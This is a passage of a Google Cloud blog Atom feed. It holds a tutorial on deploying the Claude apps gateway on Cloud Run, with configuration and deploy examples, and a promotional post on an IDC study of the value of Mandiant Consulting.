&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;We know first-hand that conducting DPIAs can be a complex task, and we remain firmly committed to helping our customers navigate DPIAs with resources at our comprehensive &lt;/span&gt;&lt;a href="https://cloud.google.com/privacy/data-protection-impact-assessment"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;DPIA Cloud Resource Center&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;</content>
    <link href="https://cloud.google.com/blog/products/identity-security/google-cloud-confirmed-to-offer-a-safer-choice-for-eu-public-sector-organizations-with-dutch-dpia-approval" rel="alternate"/>
    <category term="Google Cloud"/>
    <published>2026-07-01T16:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://cloud.google.com/blog/topics/developers-practitioners/announcing-claude-apps-gateway-for-google-cloud</id>
    <title>Get started with the Claude apps gateway for Google Cloud</title>
    <updated>2026-07-01T16:00:00+00:00</updated>
    <content type="html">&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Anthropic's agentic coding tool Claude Code has worked with Google Cloud for a while now. An individual developer could easily point &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;CLAUDE_CODE_USE_VERTEX=1&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; at a Google Cloud (GCP) project, grant the role &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;roles/aiplatform.user&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;, and inference stays inside your Google Cloud perimeter.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;That flow works great when it’s just you, or a handful of engineers. But rolling it out across an organization forces you to deal with enterprise friction: you have to manage per-developer cloud credentials, push a &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;managed-settings.json&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; to every laptop over MDM, and not be verified with zero per-developer usage attribution or easily enforceable spend caps. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The Claude apps gateway closes that gap. It is a self-hosted service, shipped with the same &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;claude&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; binary, that sits directly between your local Claude Code clients and Google Cloud. This post breaks down exactly why you should run it and what a secure deployment looks like on Google Cloud. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt;(Note: If you want to jump straight to the code, the full walkthrough lives in the &lt;/span&gt;&lt;a href="https://code.claude.com/docs/en/claude-apps-gateway-on-gcp" rel="noopener" target="_blank"&gt;&lt;span style="font-style: italic; text-decoration: underline; vertical-align: baseline;"&gt;Claude apps gateway on Google Cloud docs&lt;/span&gt;&lt;/a&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt;.)&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Why run the gateway&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Run the gateway to centralize the governance that developers and platform admins otherwise each carry alone such as identity, policy, cost, and routing. Here's what that looks like in practice. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Identity.&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; The &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;/login&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; request routes through your identity provider (IdP ) - Google Workspace or any OIDC/OpenID Connect one - and the gateway swaps the token for a short-lived session. No sensitive information lands on the developer’s laptop — such as service-account keys, API keys, or &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;ANTHROPIC_VERTEX_PROJECT_ID&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;. Onboarding is as simple as adding a user to an IdP group; offboarding by removing them, and their next session refresh fails on the spot.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Policy.&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Your RBAC (role-based access control) rules live once in &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;gateway.yaml&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;, resolved per group and enforced server-side. The gateway re-checks &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;availableModels&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; on every &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;/v1/messages&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; call, so editing local &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;managed-settings.json&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; changes nothing — and rule updates reach the whole fleet within the hour.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Telemetry.&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Every &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;claude_code.token.usage&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; metric carries the verified email and groups from the session JWT (signed session token), not the spoofable client-set &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;OTEL_RESOURCE_ATTRIBUTES&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;. The gateway ships them over OTLP/HTTP to a collector you run — Cloud Monitoring, Grafana, Datadog, whatever you use.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Spend limits.&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Set daily, weekly, or monthly caps per user, group, or org via the admin API; the gateway meters tokens against a Cloud SQL ledger and returns a 429 at the cap. Costs are at list price, so treat them as a runaway-usage guardrail, not a bill reconciliation (committed-use discounts and negotiated rates don't show up).&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Routing.&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Calls go out under a single Cloud Run service identity. Set &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;region: global&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; for Agent Platform's global endpoint, or add a second &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;upstreams:&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; entry to fail over on 5xx/429/timeout in list order. Either way, inference stays in your GCP project — quota, Data Processing Agreement, and billing all unchanged.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;How it fits together&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;A developer's local or deployed &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;claude&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; process sends inference traffic to the gateway over HTTPS. The gateway is a stateless container on Cloud Run as shown below. &lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="1" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/1_FY2cRbt.max-1000x1000.png" /&gt;
        
        &lt;/a&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The gateway validates its own session bearer — Google Workspace is only contacted at sign-in and token refresh — checks policy, and forwards the request to Agent Platform using the Cloud Run service account. Cloud SQL holds device-code sign-in state and the spend ledger; an OTLP collector receives the attributed metrics.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Setting it up on Google Cloud&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The full walkthrough, every gcloud command and the complete &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;gateway.yaml&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; reference, is in the &lt;/span&gt;&lt;a href="https://code.claude.com/docs/en/claude-gateway-on-gcp" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Claude apps gateway on Google Cloud docs&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;. The short version:&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Step 1: Provision the GCP foundation&lt;br /&gt;&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;Enable the Agent Platform, Cloud SQL, and Secret Manager APIs; create a &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;claude-gateway&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;  service account with &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;roles/aiplatform.user&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;; stand up a small Cloud SQL Postgres database instance for state. The gateway authenticates to Agent Platform as the Cloud Run service identity — you do &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;not&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; create a service-account key. Finally, create a &lt;/span&gt;&lt;a href="https://support.google.com/cloud/answer/15549257?hl=en" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;new OAuth client&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; (type Web application) in the Google Cloud console: in this example, the gateway authenticates developers against Google Workspace as an OIDC relying party, and this client is what issues it a &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;client_id&lt;/code&gt;&lt;code style="vertical-align: baseline;"&gt; and &lt;/code&gt;&lt;code style="vertical-align: baseline;"&gt;client_secret&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; for that handshake. Those two values feed the &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;oidc&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;: block in the next step. You'll later add the authorized redirect URI once the gateway URL is known.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Step 2: Configure the gateway&lt;br /&gt;&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;Write &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;gateway.yaml&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; pointing at your Google Workspace OIDC client, the Postgres connection string, and Agent Platform as the upstream. Store it in Secret Manager, along with the OIDC client secret, the Postgres URL, and a JWT signing key.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;listen:\r\n  port: 8080\r\n  public_url: https://&amp;lt;your-cloud-run-service-url&amp;gt;   # the Cloud Run service URL — with --ingress=internal this resolves only inside your VPC / corporate network\r\noidc:\r\n  issuer: https://accounts.google.com # Google Workspace\r\n  client_id: &amp;lt;client-id&amp;gt;.apps.googleusercontent.com\r\n  client_secret: ${OIDC_CLIENT_SECRET} # from Secret Manager\r\n  allowed_email_domains: [yourco.com]\r\n\r\nupstreams:\r\n  - provider: vertex\r\n    region: us-east5\r\n    project_id: &amp;lt;your-project&amp;gt;\r\n    auth: {} # ADC via the Cloud Run SA, NO key file&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7fe6b052d5b0&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Then register &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;https://&amp;lt;public_url host&amp;gt;/oauth/callback&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; as an authorized redirect URI on the Google OAuth client — it must match listen.public_url exactly:&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--medium
      
      
        h-c-grid__col
        
        h-c-grid__col--4 h-c-grid__col--offset-4
        
      "&gt;

      
      
        
        &lt;img alt="2" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/2_MvuTCiS.max-1000x1000.png" /&gt;
        
        &lt;/a&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Step 3: Deploy to Cloud Run&lt;br /&gt;&lt;/strong&gt;&lt;code style="vertical-align: baseline;"&gt;gcloud run deploy&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; with the service account attached, the Cloud SQL connection on the VPC, and the config mounted from Secret Manager. The container is stateless and scales horizontally behind the Cloud Run load balancer. GKE works equally well if that's already your platform, and only the deployment manifest changes.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;gcloud run deploy claude-gateway \\\r\n  --service-account=&amp;quot;claude-gateway@${PROJECT_ID}.iam.gserviceaccount.com&amp;quot; \\\r\n  --set-secrets=/etc/claude/gateway.yaml=gateway-config:latest \\\r\n  --ingress=internal \\       # private — developers reach the gateway over the corporate network (VPN/Interconnect into the VPC)\r\n  --no-invoker-iam-check # the gateway runs its OWN OIDC; clients carry no GCP token&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7fe6b052d550&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Developers connect over the corporate network; you may front the service with an internal Application Load Balancer — &lt;/span&gt;&lt;a href="https://cloud.google.com/run/docs/securing/private-networking"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;see Cloud Run private networking&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Either public or internal, your developers must be able to access whatever URL you configure or you can rely on the default URL from Cloud Run.  For the below example we will use&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; &lt;/span&gt;&lt;a href="https://claude-gateway.example.internal" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;https://claude-gateway.example.internal&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; &lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="3" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/3_nlczWOp.max-1000x1000.png" /&gt;
        
        &lt;/a&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Step 4: Onboard a developer&lt;br /&gt;&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;Push &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;forceLoginMethod: "gateway"&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; and &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;forceLoginGatewayUrl&lt;/code&gt;&lt;code style="vertical-align: baseline;"&gt; &lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;to developer machines via managed settings. This is how&lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt; &lt;/code&gt;&lt;code style="vertical-align: baseline;"&gt;/login&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; knows where to connect, with no manual URL entry. For an org rollout, that's your MDM channel. For a first trial without MDM, the developer can write the file by hand at &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;/Library/Application Support/ClaudeCode/managed-settings.json&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; on macOS (or &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;/etc/claude-code/managed-settings.json&lt;/code&gt;&lt;code style="vertical-align: baseline;"&gt; &lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;on Linux) if they have local admin permissions:&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;{\r\n  &amp;quot;forceLoginMethod&amp;quot;: &amp;quot;gateway&amp;quot;,\r\n  &amp;quot;forceLoginGatewayUrl&amp;quot;: &amp;quot;https://claude-gateway.example.internal&amp;quot;\r\n}&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7fe6b052d2b0&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;At Claude Code startup, the developer then presses Enter on the pre-filled gateway sign-in screen to confirm the URL.Confirm the device code on the gateway's verification page in the browser, and get redirected to Google Workspace to sign in. &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;After that, the developer completes the device-code flow in the browser against Google Workspace. If setup ends correctly, you will be able to see Cloud Gateway in the terminal view as shown below. &lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="4" src="https://storage.googleapis.com/gweb-cloudblog-publish/original_images/image1_mZfc8Bn.gif" /&gt;
        
        &lt;/a&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;What's next&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;At this point you should have a better understanding of how to configure and use &lt;/span&gt;&lt;a href="https://code.claude.com/docs/en/claude-apps-gateway-on-gcp" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Claude apps gateway on Google Cloud&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;. Here are some next steps you may want to consider: &lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Full config reference:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; every &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;gateway.yaml&lt;/code&gt; &lt;span style="vertical-align: baseline;"&gt;field is in &lt;/span&gt;&lt;a href="https://code.claude.com/docs/en/claude-apps-gateway-config" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;claude-apps-gateway-config&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;. Per-IdP setup and the GKE track live in &lt;/span&gt;&lt;a href="https://code.claude.com/docs/en/claude-apps-gateway-deploy" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;claude-apps-gateway-deploy&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; and &lt;/span&gt;&lt;a href="https://code.claude.com/docs/en/claude-apps-gateway-on-gcp" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;claude-apps-gateway-on-gcp&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Group-scoped policies:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; front the gateway with a groups-capable IdP, set &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;groups_claim&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;, and add &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;match: { groups: [...] }&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; policies above the catch-all to give different teams different model lists and tool permissions.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;For now, thanks for reading! And if you have any additional questions or feedback, feel free to reach out on socials (Roy Arsan - &lt;/span&gt;&lt;a href="https://www.linkedin.com/in/arsan/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Linkedin&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, &lt;/span&gt;&lt;a href="https://x.com/RoyArsan" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;X&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; and Ivan Nardini - &lt;/span&gt;&lt;a href="https://linkedin.com/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;LinkedIn&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, &lt;/span&gt;&lt;a href="https://x.com/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;X&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;) &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Happy building!&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;</content>
    <link href="https://cloud.google.com/blog/topics/developers-practitioners/announcing-claude-apps-gateway-for-google-cloud" rel="alternate"/>
    <category term="Google Cloud"/>
    <published>2026-07-01T16:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://cloud.google.com/blog/products/identity-security/new-idc-study-how-mandiant-transforms-security-into-a-competitive-advantage</id>
    <title>New IDC study: The business value of Mandiant Consulting</title>
    <updated>2026-07-01T16:00:00+00:00</updated>
    <content type="html">&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Security leaders are now expected to protect business growth and clearly articulate security value to their board of directors, in addition to managing risk. While translating technical defense into measurable financial returns can be challenging, Mandiant Consulting can help you bridge the gap.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Organizations that engaged with Mandiant Consulting reported an average annual benefit of $4.3 million, driving a 268% three-year ROI, with a payback period of just 4.1 months, according to a new &lt;/span&gt;&lt;a href="https://cloud.google.com/resources/content/security-idc-business-value-of-mandiant"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;IDC Business Value White Paper&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; commissioned by Mandiant. IDC based these findings on its standard ROI methodology and qualitative and quantitative interviews of current Mandiant customers, applying standard financial models. The interviewed organizations are large, highly-complex environments with an average of $17.3 billion in revenue and 74,000 employees.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;At Google Cloud, we strongly believe that security is a strategic business enabler that can directly impact your bottom line.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;One healthcare organization interviewed by IDC reported that its partnership with Mandiant completely changed the dynamic of its commercial conversations. "Mandiant has enabled us to engage more confidently with customers and position our security posture as a market differentiator, with security now consistently ranking among the top three reasons clients choose us. It has also contributed to reducing our insurance costs by $50,000 per year,” said the healthcare organization.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Frontline threat intelligence in action&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;CISOs consistently struggle with internal resource constraints and skill deficits, and internal security teams rarely have the time to track every emerging threat group. Mandiant addresses this by distilling findings and delivering frontline threat intelligence and guidance derived from over 500K hours of global incident investigations last year. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Instead of trying to monitor everything, resource-constrained teams can focus their limited hours on the specific threats that are most relevant to them and likely to target their specific industry and build specific targeted defenses. A retail organization highlighted how working with Mandiant experts allowed them to actively defend against targeted campaigns, like those from the Scattered Spider cybercrime group. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;"One of the most significant accomplishments from using Mandiant has been their ability to help us create detection use cases specific to Scattered Spider based on their industry knowledge. This has enabled us to monitor, detect, and neutralize related attacks, which is a key reason we have avoided incidents,” the organization told IDC.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;To ensure detections are built on solid foundations, many organizations also use Mandiant to run deep technical audits across their identity infrastructure — including Active Directory, privileged account management, and multi-factor authentication (MFA). This independent verification provides crucial reassurance to leadership, an energy-sector organization told IDC. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;"Mandiant provides external assurance that our cyberprogram is thorough and validated from a risk management perspective. Their validation and recommendations have helped us reinforce that messaging to our board. They are highly professional, risk aligned, and among the most trusted,” they said.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Quantifying the business and operational impact&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;By synthesizing customer experiences, IDC quantified the broader operational advantages seen by customers who worked with Mandiant:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;59% reported greater preparedness to successfully address cyberattacks.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;45% reported overall improvement in cyber-resilience.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;36% reported more efficient security analyst teams, allowing internal staff to focus on more strategic, growth-oriented initiatives.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;To learn more about how security is a business enabler, &lt;/span&gt;&lt;a href="https://www.brighttalk.com/webcast/7451/670220?utm_source=Mandiant&amp;amp;utm_medium=brighttalk&amp;amp;utm_campaign=670220" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;register for our July customer webinar&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;hr /&gt;
&lt;p&gt;&lt;sub&gt;&lt;em&gt;&lt;span style="vertical-align: baseline;"&gt;Source: &lt;/span&gt;&lt;a href="https://services.google.com/fh/files/misc/the_idc_business_value_of_mandiant_consulting_snapshot.pdf" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;IDC Business Value White Paper,&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; Sponsored by Google, The Business Value of Mandiant Consulting (Doc #US54605426-BVWP, July 2026)&lt;/span&gt;&lt;/em&gt;&lt;/sub&gt;&lt;/p&gt;&lt;/div&gt;</content>
    <link href="https://cloud.google.com/blog/products/identity-security/new-idc-study-how-mandiant-transforms-security-into-a-competitive-advantage" rel="alternate"/>
    <category term="Google Cloud"/>
    <published>2026-07-01T16:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://blog.google/products-and-platforms/products/education/nyc-ai-summit</id>
    <title>New York City educators and industry leaders gathered at Google’s offices to shape the future of AI in classrooms.</title>
    <updated>2026-07-01T16:00:00+00:00</updated>
